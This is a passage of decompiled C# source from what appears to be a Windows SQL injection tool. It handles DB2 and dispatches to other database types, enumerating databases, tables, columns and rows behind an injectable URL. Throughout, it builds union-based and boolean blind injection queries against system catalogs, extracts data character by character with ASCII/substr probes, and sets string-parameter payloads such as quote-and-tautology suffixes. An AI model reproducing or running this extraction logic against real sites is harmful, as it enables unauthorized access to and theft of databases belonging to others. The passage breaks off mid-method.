				string text = ReadListViewInfoItems(i);
				if (text.Equals("Version"))
				{
					string itemByDB = GetItemByDB2("select", "rtrim(char(versionnumber))", "from sysibm.sysversions", 126, 32);
					AddSubItem2ListViewInfo(i + "^" + itemByDB);
				}
				else if (text.Equals("Server"))
				{
					if (string.IsNullOrEmpty(Server))
					{
						Server = GetServer(URL);
					}
					if (string.IsNullOrEmpty(Server))
					{
						Server = "NULL";
					}
					AddSubItem2ListViewInfo(i + "^" + Server);
				}
				else if (text.Equals("user"))
				{
					string itemByDB2 = GetItemByDB2("select", "rtrim(user)", "from sysibm.sysdummy1", 255, 128);
					AddSubItem2ListViewInfo(i + "^" + itemByDB2);
				}
				else if (text.Equals("Database"))
				{
					string itemByDB3 = GetItemByDB2("select", "rtrim(current server)", "from sysibm.sysdummy1", 255, 128);
					AddSubItem2ListViewInfo(i + "^" + itemByDB3);
					if (!string.IsNullOrEmpty(itemByDB3))
					{
						AddDB2TreeView(itemByDB3);
					}
				}
			}
		}

		private void ExecDB2GetDB()
		{
			mainfrm.DisplayLogList("Getting DB ...");
			string itemByDB = GetItemByDB2("select", "current server", "from sysibm.sysdummy1", 255, 128);
			if (!string.IsNullOrEmpty(itemByDB))
			{
				AddDB2TreeView(itemByDB);
			}
		}

		private void ExecDB2GetTable(object data)
		{
			mainfrm.DisplayLogList("Getting Tables ...");
			int treeViewDBCount = GetTreeViewDBCount("");
			for (int i = 0; i < treeViewDBCount; i++)
			{
				if (TreeViewDBChecked(i.ToString()))
				{
					GetTreeViewDBText(i.ToString());
					int num = GetIntValue("select count(1) from sysibm.systables where creator=user", 256, 0);
					mainfrm.DisplayLogList("Got Table Num: " + num);
					if (num < 0)
					{
						num = 256;
					}
					string[] array = new string[num];
					for (int j = 0; j < num; j++)
					{
						array[j] = i + "^" + (j + 1);
						ThreadPool.QueueUserWorkItem(new WaitCallback(DB2GetTableDoWork), array[j]);
					}
					break;
				}
			}
		}

		private void DB2GetTableDoWork(object data)
		{
			try
			{
				string text = (string)data;
				string[] array = text.Split(new char[1]
				{
					'^'
				});
				string str = array[1];
				string text2 = "";
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					text2 = GetItemByDB2("select", "NAME", "from (SELECT name from (SELECT name FROM sysibm.systables where creator=user order by name fetch first " + str + " rows only) sq order by name desc fetch first 1 rows only)T", 255, 128);
				}
				if (string.IsNullOrEmpty(text2))
				{
					text2 = GetItemByDB2("select", "NAME", "from (SELECT name FROM sysibm.systables where creator=user order by name fetch first " + str + " rows only) sq order by name desc fetch first 1 rows only", 255, 128);
				}
				AddTable2TreeView(array[0] + "^" + text2);
			}
			catch
			{
			}
		}

		private void ExecDB2GetColumn(object data)
		{
			_ = DateTime.Now;
			string text = "";
			int treeViewDBCount = GetTreeViewDBCount("");
			for (int i = 0; i < treeViewDBCount; i++)
			{
				if (!TreeViewDBChecked(i.ToString()))
				{
					continue;
				}
				GetTreeViewDBText(i.ToString());
				int treeViewDBCount2 = GetTreeViewDBCount(i.ToString());
				for (int j = 0; j < treeViewDBCount2; j++)
				{
					if (TreeViewDBChecked(i + "^" + j))
					{
						mainfrm.DisplayLogList("Getting Columns ...");
						string text2 = "";
						text = GetTreeViewDBText(i + "^" + j);
						int num = GetIntValue("select count(NAME) FROM sysibm.syscolumns where tbname=" + mainfrm.CurrentSite.EscapeSingleQuotes(text, DBType.DB2), 128, 0);
						mainfrm.DisplayLogList("Got Column Num: " + num);
						if (num < 0)
						{
							num = 128;
						}
						for (int k = 0; k < num; k++)
						{
							text2 = i + "^" + j + "^" + (k + 1) + "^" + text;
							ThreadPool.QueueUserWorkItem(new WaitCallback(DB2GetColumnDoWork), text2);
						}
						break;
					}
				}
			}
		}

		private void DB2GetColumnDoWork(object data)
		{
			try
			{
				string text = (string)data;
				string[] array = text.Split(new char[1]
				{
					'^'
				});
				string text2 = array[0];
				string text3 = array[1];
				string text4 = array[2];
				string itemName = array[3];
				string text5 = "";
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					text5 = GetItemByDB2("select ", "NAME", "from (select name from (select name from sysibm.syscolumns where tbname=" + mainfrm.CurrentSite.EscapeSingleQuotes(itemName, DBType.DB2) + " order by name fetch first " + text4 + " rows only) sq order by name desc fetch first 1 rows only)T", 255, 128);
				}
				if (string.IsNullOrEmpty(text5))
				{
					text5 = GetItemByDB2("select ", "NAME", "from (select name from sysibm.syscolumns where tbname=" + mainfrm.CurrentSite.EscapeSingleQuotes(itemName, DBType.DB2) + " order by name fetch first " + text4 + " rows only) sq order by name desc fetch first 1 rows only", 255, 128);
				}
				AddColumn2TreeView(text2 + "^" + text3 + "^" + text5);
			}
			catch
			{
			}
		}

		private void ExecDB2GetData(int RowsBegin, int RowsEnd)
		{
			//IL_0034: Unknown result type (might be due to invalid IL or missing references)
			//IL_003a: Expected O, but got Unknown
			//IL_0065: Unknown result type (might be due to invalid IL or missing references)
			//IL_006b: Expected O, but got Unknown
			//IL_00a7: Unknown result type (might be due to invalid IL or missing references)
			//IL_00ae: Expected O, but got Unknown
			//IL_016f: Unknown result type (might be due to invalid IL or missing references)
			//IL_01af: Unknown result type (might be due to invalid IL or missing references)
			mainfrm.DisplayLogList("Getting Data ...");
			string text = "";
			foreach (TreeNode node in treeViewDB.get_Nodes())
			{
				TreeNode val = node;
				if (!val.get_Checked())
				{
					continue;
				}
				val.get_Text();
				foreach (TreeNode node2 in val.get_Nodes())
				{
					TreeNode val2 = node2;
					if (!val2.get_Checked())
					{
						continue;
					}
					text = val2.get_Text();
					string text2 = "";
					string text3 = "";
					string text4 = "";
					foreach (TreeNode node3 in val2.get_Nodes())
					{
						TreeNode val3 = node3;
						if (val3.get_Checked())
						{
							if (string.IsNullOrEmpty(text2))
							{
								text4 = val3.get_Text();
							}
							else
							{
								text2 += "||chr(94)||";
							}
							text2 = text2 + "coalesce(rtrim(cast(" + val3.get_Text() + " as char(250))),chr(32))";
							if (!string.IsNullOrEmpty(text3))
							{
								text3 += ",";
							}
							text3 += val3.get_Text();
						}
					}
					int intValue = GetIntValue("select count(1) from " + text, RowsEnd, 0);
					mainfrm.DisplayLogList("Got Rows Num: " + intValue);
					if (intValue == 0)
					{
						MessageBox.Show("No Records Found!");
						break;
					}
					if (intValue > 0 && intValue < RowsEnd)
					{
						RowsEnd = intValue;
						((ToolStripItem)txtRowsEnd).set_Text(intValue.ToString());
					}
					if (RowsBegin > RowsEnd)
					{
						MessageBox.Show("* Exceed Records Range!\r\n* The Rows Num=" + intValue);
						break;
					}
					for (int i = RowsBegin - 1; i < RowsEnd; i++)
					{
						string state = text2 + ":" + text3 + ":" + text + ":" + i + ":" + text4;
						ThreadPool.QueueUserWorkItem(new WaitCallback(DB2GetDataDoWork), state);
					}
					break;
				}
				break;
			}
		}

		private string GetItemByDB2(string SelectExpression, string ItemName, string FromExpression, int MaxChar, int MaxLength)
		{
			string text = "";
			try
			{
				if (WebSite.CurrentStatus == TaskStatus.Stop)
				{
					return "";
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
				{
					GetInjectMethod(URL);
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					text = GetItemByFieldEcho(SelectExpression, ItemName, FromExpression, NeedTempTable: false);
					mainfrm.DisplayLogList("Got : " + text);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					return "";
				}
				int intValue = GetIntValue(SelectExpression + " length(" + ItemName + ") " + FromExpression, MaxLength, 0);
				mainfrm.DisplayLogList("Got Length: " + intValue);
				if (intValue < 1)
				{
					return "";
				}
				List<byte> list = new List<byte>();
				for (int i = 0; i < intValue; i++)
				{
					int intValue2 = GetIntValue(SelectExpression + " ASCII(substr(" + ItemName + "," + (i + 1) + ",1)) " + FromExpression, MaxChar, 0);
					if (intValue2 >= 0)
					{
						list.Add((byte)intValue2);
					}
					else
					{
						intValue2 = GetIntValue(SelectExpression + " ASCII(substr(" + ItemName + "," + (i + 1) + ",1)) " + FromExpression, 65535, 0);
						if (intValue2 >= 0)
						{
							byte item = (byte)(intValue2 >> 8);
							byte item2 = (byte)((uint)intValue2 & 0xFFu);
							if (mainfrm.CurrentSite.DBEncoding == Encoding.Unicode)
							{
								list.Add(item2);
								list.Add(item);
							}
							else
							{
								list.Add(item);
								list.Add(item2);
							}
						}
						else
						{
							intValue2 = GetIntValue(SelectExpression + " ASCII(substr(" + ItemName + "," + (i + 1) + ",1)) " + FromExpression, 15712191, 14712960);
							if (intValue2 > 0)
							{
								list.Add((byte)(intValue2 >> 16));
								list.Add((byte)((uint)(intValue2 >> 8) & 0xFFu));
								list.Add((byte)((uint)intValue2 & 0xFFu));
							}
							else
							{
								list.Add(95);
							}
						}
					}
					byte[] bytes = list.ToArray();
					text = mainfrm.CurrentSite.DBEncoding.GetString(bytes);
					mainfrm.DisplayLogList("Got " + (i + 1) + "/" + intValue + " :  " + text);
				}
				return text;
			}
			catch
			{
				return text;
			}
		}

		private void DB2GetDataDoWork(object data)
		{
			try
			{
				string[] array = ((string)data).Split(new char[1]
				{
					':'
				});
				string itemName = array[0];
				string text = array[1];
				string text2 = array[2];
				int num = int.Parse(array[3]);
				string text3 = array[4];
				string text4 = "";
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					text4 = GetItemByDB2("select", itemName, "from (select  " + text + " from (select  " + text + " from " + text2 + " order by " + text3 + " fetch first " + (num + 1) + " rows only) sq order by " + text3 + " desc fetch first 1 rows only)T", 255, 1024);
				}
				if (string.IsNullOrEmpty(text4))
				{
					text4 = GetItemByDB2("select", itemName, "from (select  " + text + " from " + text2 + " order by " + text3 + " fetch first " + (num + 1) + " rows only) sq order by " + text3 + " desc fetch first 1 rows only", 255, 1024);
				}
				AddItem2ListViewData(text4);
			}
			catch
			{
			}
		}

		private void GetEnvInfo(object data)
		{
			//IL_004b: Unknown result type (might be due to invalid IL or missing references)
			if (string.IsNullOrEmpty(URL))
			{
				InitURL();
			}
			if (string.IsNullOrEmpty(URL))
			{
				return;
			}
			if (mainfrm.ReqType == RequestType.GET && URL.IndexOf('=') < 0)
			{
				MessageBox.Show("* Current URL is not injectable!\r\n* Please input a injectable URL such as: http://127.0.0.1/topic.asp?id=10\r\n* If you don't know which URL is injectable, please scan the site at first.", "Information", (MessageBoxButtons)0, (MessageBoxIcon)64);
				return;
			}
			mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: false);
			if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord) || mainfrm.CurrentSite.paramType == ParameterType.NotInjectable)
			{
				return;
			}
			InitURL();
			if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
			{
				mainfrm.CurrentSite.DatabaseType = GetDBType(URL);
			}
			else
			{
				UpdateComboDBType(mainfrm.CurrentSite.DatabaseType.ToString());
			}
			if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
			{
				return;
			}
			if (vulnSQL.vulnInjectMethod == InjectMethod.ToBeDetect)
			{
				if (mainfrm.CurrentSite.DatabaseType != DBType.Access)
				{
					GetInjectMethod(URL);
				}
				else
				{
					if (GetAExistedTableByAccess().Equals("NULL"))
					{
						ThreadPool.QueueUserWorkItem(new WaitCallback(ExecAccessGetTable));
						return;
					}
					GetInjectMethod(URL);
				}
			}
			if (GetListViewCount(listViewEnv) >= 1)
			{
				if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
				{
					ThreadPool.QueueUserWorkItem(new WaitCallback(ExecSQLServerCheck));
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
				{
					ThreadPool.QueueUserWorkItem(new WaitCallback(ExecAccessCheck));
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
				{
					ThreadPool.QueueUserWorkItem(new WaitCallback(ExecMySQLCheck));
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
				{
					ThreadPool.QueueUserWorkItem(new WaitCallback(ExecOracleCheck));
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
				{
					ThreadPool.QueueUserWorkItem(new WaitCallback(ExecDB2Check));
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.PostgreSQL)
				{
					ThreadPool.QueueUserWorkItem(new WaitCallback(ExecPostgreSQLCheck));
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.SQLite)
				{
					ThreadPool.QueueUserWorkItem(new WaitCallback(ExecSQLiteCheck));
				}
			}
		}

		private void btnGetInfo_Click(object sender, EventArgs e)
		{
			//IL_0012: Unknown result type (might be due to invalid IL or missing references)
			//IL_002b: Unknown result type (might be due to invalid IL or missing references)
			if (GetBlindLocked)
			{
				MessageBox.Show("Please wait a moment till the task: Get Field Number and location finished!", "Information");
				return;
			}
			if (WebSite.CurrentStatus == TaskStatus.Stop)
			{
				MessageBox.Show("Please wait a moment till the task: Terminating Threads Finished!", "Information");
				return;
			}
			InitURL();
			ThreadPool.QueueUserWorkItem(new WaitCallback(GetEnvInfo));
		}

		private void cmbDBTypeList_DropDownClosed(object sender, EventArgs e)
		{
			try
			{
				mainfrm.CurrentSite.DatabaseType = (DBType)Enum.Parse(typeof(DBType), ((ToolStripItem)cmbDBTypeList).get_Text());
				InitByDBType(IsLoadFromFile: false);
			}
			catch (Exception)
			{
			}
		}

		private void cmbParameterType_DropDownClosed(object sender, EventArgs e)
		{
			string text = ((ToolStripItem)cmbParameterType).get_Text();
			if (text.Equals("UnKnown"))
			{
				mainfrm.CurrentSite.paramType = ParameterType.UnKnown;
				PreFix = "";
				PostFix = "";
			}
			else if (text.Equals("Integer"))
			{
				mainfrm.CurrentSite.paramType = ParameterType.Integer;
				PreFix = "";
				PostFix = "";
			}
			else if (text.Equals("String"))
			{
				mainfrm.CurrentSite.paramType = ParameterType.String;
				PreFix = "%27";
				PostFix = "%20and%20%271%27=%271";
			}
			else if (text.Equals("Search"))
			{
				mainfrm.CurrentSite.paramType = ParameterType.Search;
				PreFix = "%27";
				PostFix = "%20or%20%27%25%27%3D%27";
			}
		}

		private void btnGetEnv_Click(object sender, EventArgs e)
		{
			if (mainfrm.CurrentSite.injectMethod == InjectMethod.ErrorBased)
			{
				radioPlainText.set_Checked(true);
			}
			else if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
			{
				radioFieldEcho.set_Checked(true);
			}
			else if (mainfrm.CurrentSite.injectMethod == InjectMethod.BooleanBased)
			{
				radioBlind.set_Checked(true);
			}
			else if (mainfrm.CurrentSite.injectMethod == InjectMethod.CrossSiteBased)
			{
				radioCrossSite.set_Checked(true);
			}
			else if (mainfrm.CurrentSite.injectMethod == InjectMethod.TimeBased)
			{
				radioTime.set_Checked(true);
			}
			else
			{
				radioPlainText.set_Checked(false);
				radioFieldEcho.set_Checked(false);
				radioBlind.set_Checked(false);
				radioCrossSite.set_Checked(false);
				radioTime.set_Checked(false);
			}
			((Control)txtInjectField).set_Text(mainfrm.CurrentSite.unionFieldIndex.ToString());
			((Control)txtFieldNum).set_Text(mainfrm.CurrentSite.unionFieldsCount.ToString());
			((Control)txtWildField).set_Text(WildField);
			((Control)btnSetEnv).set_Enabled(true);
			((Control)txtComment).set_Text(CommentString);
			((Control)ComboBoxWebEncoding).set_Text(mainfrm.CurrentSite.WebEncoding.BodyName);
			((Control)ComboBoxDBEncoding).set_Text(mainfrm.CurrentSite.DBEncoding.BodyName);
		}

		private void btnSetEnv_Click(object sender, EventArgs e)
		{
			//IL_0196: Unknown result type (might be due to invalid IL or missing references)
			//IL_01b4: Unknown result type (might be due to invalid IL or missing references)
			//IL_01d2: Unknown result type (might be due to invalid IL or missing references)
			//IL_02ca: Unknown result type (might be due to invalid IL or missing references)
			//IL_02e8: Unknown result type (might be due to invalid IL or missing references)
			if (radioPlainText.get_Checked())
			{
				mainfrm.CurrentSite.injectMethod = InjectMethod.ErrorBased;
			}
			else if (radioFieldEcho.get_Checked())
			{
				mainfrm.CurrentSite.injectMethod = InjectMethod.UnionBased;
			}
			else if (radioBlind.get_Checked())
			{
				mainfrm.CurrentSite.injectMethod = InjectMethod.BooleanBased;
			}
			else if (radioCrossSite.get_Checked())
			{
				mainfrm.CurrentSite.injectMethod = InjectMethod.CrossSiteBased;
			}
			else if (radioTime.get_Checked())
			{
				mainfrm.CurrentSite.injectMethod = InjectMethod.TimeBased;
			}
			try
			{
				if (!string.IsNullOrEmpty(((Control)txtInjectField).get_Text()))
				{
					mainfrm.CurrentSite.unionFieldIndex = int.Parse(((Control)txtInjectField).get_Text());
				}
				if (!string.IsNullOrEmpty(((Control)txtFieldNum).get_Text()))
				{
					mainfrm.CurrentSite.unionFieldsCount = int.Parse(((Control)txtFieldNum).get_Text());
				}
				if (!string.IsNullOrEmpty(((Control)txtWildField).get_Text()))
				{
					WildField = ((Control)txtWildField).get_Text();
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					if (mainfrm.CurrentSite.unionFieldIndex > mainfrm.CurrentSite.unionFieldsCount)
					{
						MessageBox.Show("Please Check the Input: " + mainfrm.CurrentSite.unionFieldIndex + " is larger than " + mainfrm.CurrentSite.unionFieldsCount);
					}
					if (mainfrm.CurrentSite.unionFieldIndex < 1)
					{
						MessageBox.Show("The Number should >=1 .");
					}
					if (mainfrm.CurrentSite.unionFieldsCount < 1)
					{
						MessageBox.Show("The Number should >=1 .");
					}
				}
				((Control)btnSetEnv).set_Enabled(false);
				string text = ((Control)txtComment).get_Text();
				if (!string.IsNullOrEmpty(text))
				{
					CommentString = text;
				}
				mainfrm.CurrentSite.WebEncoding = Encoding.GetEncoding(((Control)ComboBoxWebEncoding).get_Text());
				mainfrm.CurrentSite.DBEncoding = Encoding.GetEncoding(((Control)ComboBoxDBEncoding).get_Text());
				MessageBox.Show("The Type of Getting Data Has Been Set To " + mainfrm.CurrentSite.injectMethod.ToString() + "\r\nComments: " + CommentString + "\r\nWeb Encoding: " + mainfrm.CurrentSite.WebEncoding.BodyName + "\r\nDatabase Encoding: " + mainfrm.CurrentSite.DBEncoding.BodyName, "Done! ", (MessageBoxButtons)0, (MessageBoxIcon)64);
			}
			catch (Exception ex)
			{
				MessageBox.Show("Please Check the Input!\r\n" + ex.Message, "Notice");
			}
		}

		private void btnGetDB_Click(object sender, EventArgs e)
		{
			//IL_007b: Unknown result type (might be due to invalid IL or missing references)
			InitURL();
			if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
			{
				mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
			}
			if (mainfrm.CurrentSite.paramType == ParameterType.UnKnown)
			{
				mainfrm.CurrentSite.paramType = GetParameterType();
			}
			if (mainfrm.CurrentSite.paramType == ParameterType.NotInjectable)
			{
				MessageBox.Show("Current URL is not injectable !");
				return;
			}
			if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
			{
				mainfrm.CurrentSite.DatabaseType = GetDBType(URL);
				if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
				{
					return;
				}
			}
			treeViewDB.get_Nodes().Clear();
			if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
			{
				ExecSQLServerGetDB();
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
			{
				ExecMySQLGetDB();
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
			{
				ExecOracleGetDB();
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
			{
				ExecDB2GetDB();
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
			{
				AddDB2TreeView("Access");
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.PostgreSQL)
			{
				ExecPostgreSQLGetDB();
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.SQLite)
			{
				AddDB2TreeView("SQLite");
			}
		}

		private void btnGetTable_Click(object sender, EventArgs e)
		{
			InitURL();
			if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
			{
				mainfrm.CurrentSite.DatabaseType = GetDBType(URL);
			}
			if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecSQLServerGetTable));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecMySQLGetTable));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecOracleGetTable));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecDB2GetTable));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecAccessGetTable));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.PostgreSQL)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecPostgreSQLGetTable));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.SQLite)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecSQLiteGetTable));
			}
			((ToolStripItem)btnGetTable).set_Enabled(false);
		}

		private void btnGetColumn_Click(object sender, EventArgs e)
		{
			InitURL();
			if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
			{
				mainfrm.CurrentSite.DatabaseType = GetDBType(URL);
			}
			if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecSQLServerGetColumn));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecMySQLGetColumn));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecOracleGetColumn));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecDB2GetColumn));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecAccessGetColumn));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.PostgreSQL)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecPostgreSQLGetColumn));
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.SQLite)
			{
				ThreadPool.QueueUserWorkItem(new WaitCallback(ExecSQLiteGetColumn));
			}
			((ToolStripItem)btnGetColumn).set_Enabled(false);
		}

		private void treeViewDB_BeforeCheck(object sender, TreeViewCancelEventArgs e)
		{
			//IL_0001: Unknown result type (might be due to invalid IL or missing references)
			//IL_0007: Invalid comparison between Unknown and I4
			//IL_003e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0044: Expected O, but got Unknown
			//IL_006f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0075: Expected O, but got Unknown
			//IL_00e8: Unknown result type (might be due to invalid IL or missing references)
			//IL_00ee: Expected O, but got Unknown
			//IL_0135: Unknown result type (might be due to invalid IL or missing references)
			//IL_013c: Expected O, but got Unknown
			//IL_01a6: Unknown result type (might be due to invalid IL or missing references)
			//IL_01ad: Expected O, but got Unknown
			//IL_01fa: Unknown result type (might be due to invalid IL or missing references)
			//IL_0201: Expected O, but got Unknown
			if ((int)e.get_Action() != 2)
			{
				return;
			}
			int level = e.get_Node().get_Level();
			if (level == 0)
			{
				foreach (TreeNode node in e.get_Node().get_TreeView().get_Nodes())
				{
					TreeNode val = node;
					val.set_Checked(false);
					if (val.get_Nodes().get_Count() <= 0)
					{
						continue;
					}
					foreach (TreeNode node2 in val.get_Nodes())
					{
						TreeNode val2 = node2;
						val2.set_Checked(false);
					}
				}
			}
			if (level == 1)
			{
				foreach (TreeNode node3 in e.get_Node().get_Parent().get_TreeView()
					.get_Nodes())
				{
					TreeNode val3 = node3;
					val3.set_Checked(false);
				}
				foreach (TreeNode node4 in e.get_Node().get_Parent().get_Nodes())
				{
					TreeNode val4 = node4;
					val4.set_Checked(false);
				}
				e.get_Node().get_Parent().set_Checked(true);
			}
			if (level != 2)
			{
				return;
			}
			foreach (TreeNode node5 in e.get_Node().get_Parent().get_Parent()
				.get_TreeView()
				.get_Nodes())
			{
				TreeNode val5 = node5;
				val5.set_Checked(false);
			}
			foreach (TreeNode node6 in e.get_Node().get_Parent().get_Parent()
				.get_Nodes())
			{
				TreeNode val6 = node6;
				val6.set_Checked(false);
			}
			e.get_Node().get_Parent().set_Checked(true);
			e.get_Node().get_Parent().get_Parent()
				.set_Checked(true);
		}

		private void treeViewDB_AfterCheck(object sender, TreeViewEventArgs e)
		{
			//IL_0001: Unknown result type (might be due to invalid IL or missing references)
			//IL_0007: Invalid comparison between Unknown and I4
			//IL_007c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0082: Expected O, but got Unknown
			if ((int)e.get_Action() != 2)
			{
				return;
			}
			int level = e.get_Node().get_Level();
			if (level == 0)
			{
				((ToolStripItem)btnGetTable).set_Enabled(true);
			}
			if (level == 1)
			{
				((ToolStripItem)btnGetColumn).set_Enabled(true);
			}
			if (level != 2)
			{
				return;
			}
			listViewData.get_Items().Clear();
			listViewData.get_Columns().Clear();
			foreach (TreeNode node in e.get_Node().get_Parent().get_Nodes())
			{
				TreeNode val = node;
				if (val.get_Checked())
				{
					listViewData.get_Columns().Add(val.get_Text());
				}
			}
			((ToolStripItem)btnGetData).set_Enabled(true);
		}

		private void treeViewDB_MouseDown(object sender, MouseEventArgs e)
		{
			//IL_0012: Unknown result type (might be due to invalid IL or missing references)
			//IL_0018: Expected O, but got Unknown
			if (treeViewDB.get_Nodes().get_Count() == 0)
			{
				ContextMenuStrip val = new ContextMenuStrip();
				((ToolStrip)val).get_Items().Add("New Node", (Image)null, (EventHandler)ItemClick);
				((Control)treeViewDB).set_ContextMenuStrip(val);
			}
		}

		private void ItemClick(object sender, EventArgs e)
		{
			//IL_0000: Unknown result type (might be due to invalid IL or missing references)
			//IL_0006: Expected O, but got Unknown
			//IL_0007: Unknown result type (might be due to invalid IL or missing references)
			//IL_016c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0172: Invalid comparison between Unknown and I4
			//IL_01ca: Unknown result type (might be due to invalid IL or missing references)
			try
			{
				TreeNode val = new TreeNode();
				switch (((ToolStripItem)(ToolStripMenuItem)sender).get_Text())
				{
				case "New Node":
					if (treeViewDB.get_Nodes().get_Count() == 0)
					{
						val = treeViewDB.get_Nodes().Add("Node0001");
						val.BeginEdit();
					}
					else
					{
						if (treeViewDB.get_SelectedNode() == null)
						{
							break;
						}
						if (treeViewDB.get_SelectedNode().get_Level() == 0)
						{
							val = treeViewDB.get_SelectedNode().get_TreeView().get_Nodes()
								.Add("Node0001");
							val.BeginEdit();
						}
						else
						{
							val = treeViewDB.get_SelectedNode().get_Parent().get_Nodes()
								.Add("Node0001");
							val.BeginEdit();
						}
					}
					treeViewDB.ExpandAll();
					break;
				case "New Sub Node":
					val = treeViewDB.get_SelectedNode().get_Nodes().Add("Node0001");
					treeViewDB.ExpandAll();
					val.BeginEdit();
					break;
				case "Edit Node":
					treeViewDB.get_SelectedNode().BeginEdit();
					break;
				case "Remove Node":
					if ((int)MessageBox.Show("Are you sure to delete the selected node?", "Confirm", (MessageBoxButtons)1, (MessageBoxIcon)32) == 1)
					{
						treeViewDB.get_SelectedNode().Remove();
					}
					break;
				case "Show SubNodes Count":
					MessageBox.Show("SubNodes Count of " + treeViewDB.get_SelectedNode().get_Text() + ": " + treeViewDB.get_SelectedNode().get_Nodes().get_Count(), "Information", (MessageBoxButtons)0, (MessageBoxIcon)64);
					break;
				}
			}
			catch
			{
			}
		}

		private void treeViewDB_NodeMouseClick(object sender, TreeNodeMouseClickEventArgs e)
		{
			//IL_0019: Unknown result type (might be due to invalid IL or missing references)
			//IL_002c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0032: Expected O, but got Unknown
			Point val = default(Point);
			((Point)(ref val))._002Ector(((MouseEventArgs)e).get_X(), ((MouseEventArgs)e).get_Y());
			TreeNode nodeAt = treeViewDB.GetNodeAt(val);
			treeViewDB.set_SelectedNode(nodeAt);
			ContextMenuStrip val2 = new ContextMenuStrip();
			((ToolStrip)val2).get_Items().Add("New Node", (Image)null, (EventHandler)ItemClick);
			if (nodeAt != null)
			{
				if (nodeAt.get_Level() < 2)
				{
					((ToolStrip)val2).get_Items().Add("New Sub Node", (Image)null, (EventHandler)ItemClick);
				}
				((ToolStrip)val2).get_Items().Add("Edit Node", (Image)null, (EventHandler)ItemClick);
				((ToolStrip)val2).get_Items().Add("Remove Node", (Image)null, (EventHandler)ItemClick);
				((ToolStrip)val2).get_Items().Add("Show SubNodes Count", (Image)null, (EventHandler)ItemClick);
			}
			((Control)treeViewDB).set_ContextMenuStrip(val2);
		}

		private void listViewData_MouseClick(object sender, MouseEventArgs e)
		{
			//IL_0014: Unknown result type (might be due to invalid IL or missing references)
			//IL_001a: Expected O, but got Unknown
			if (listViewData.get_SelectedItems().get_Count() >= 1)
			{
				ContextMenuStrip val = new ContextMenuStrip();
				((ToolStrip)val).get_Items().Add("Copy Data Row To ClipBoard", (Image)null, (EventHandler)DataItemClick);
				((Control)listViewData).set_ContextMenuStrip(val);
			}
		}

		private void DataItemClick(object sender, EventArgs e)
		{
			//IL_006b: Unknown result type (might be due to invalid IL or missing references)
			try
			{
